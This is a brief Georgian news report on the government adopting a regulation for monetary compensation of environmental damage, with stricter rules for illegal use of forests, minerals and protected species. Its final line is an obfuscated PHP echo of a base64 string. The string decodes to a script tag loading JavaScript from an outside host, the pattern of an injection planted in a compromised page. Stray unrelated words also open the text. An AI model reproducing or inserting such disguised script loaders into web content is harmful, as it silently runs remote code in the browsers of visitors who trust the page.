celsiusi
ავერსი შნაიდერი
საქართველოს მთავრობის დღევანდელ სხდომაზე გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს მიერ ინიცირებული პროექტი „ტექნიკური რეგლამენტი გარემოსთვის მიყენებული ზიანის ფულადი სახით ანაზღაურების წესის დამტკიცების შესახებ“ მიიღეს.
 
გარემოს დაცვის სამინისტროს ინფორმაციით, პროექტი მომზადებულია „გარემოსდაცვითი პასუხისმგებლობის შესახებ“ საქართველოს კანონის შესაბამისად და მისი მიზანია გარემოსთვის მიყენებული ზიანის გამოანგარიშებისა და მიყენებული ზიანის ფულადი ანაზღაურების წესის დადგენა იმ შემთხვევაში, თუ გარემოს დაზიანების დონე არ შეესაბამება კანონით დადგენილ მნიშვნელოვანი ზიანის კრიტერიუმებს.
 
„მთავრობის დადგენილების შესაბამისად, გარკვეულ შემთხვევებში მკაცრდება გარემოსთვის მიყენებული ზიანის გაანგარიშების წესი. კერძოდ, გამკაცრდა ტყის რესურსების, ზოგიერთი სახეობის სასარგებლო წიაღისეულის, ასევე ცხოველთა სამყაროს სახეობების (მაგალითად, ბექობის არწივი, ფასკუნჯი, წითელთავა შავარდენი, კავკასიური შურთხი და სხვა) უკანონო სარგებლობისას გარემოსთვის მიყენებული ზიანის გამოანგარიშების წესი, ასევე გასწორდა ტერმინები საქართველოს ტყის კოდექსის მიხედვით“, – ნათქვამია გარემოს დაცვის სამინისტროს ინფორმაციაში.
 
 
 
 
459
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");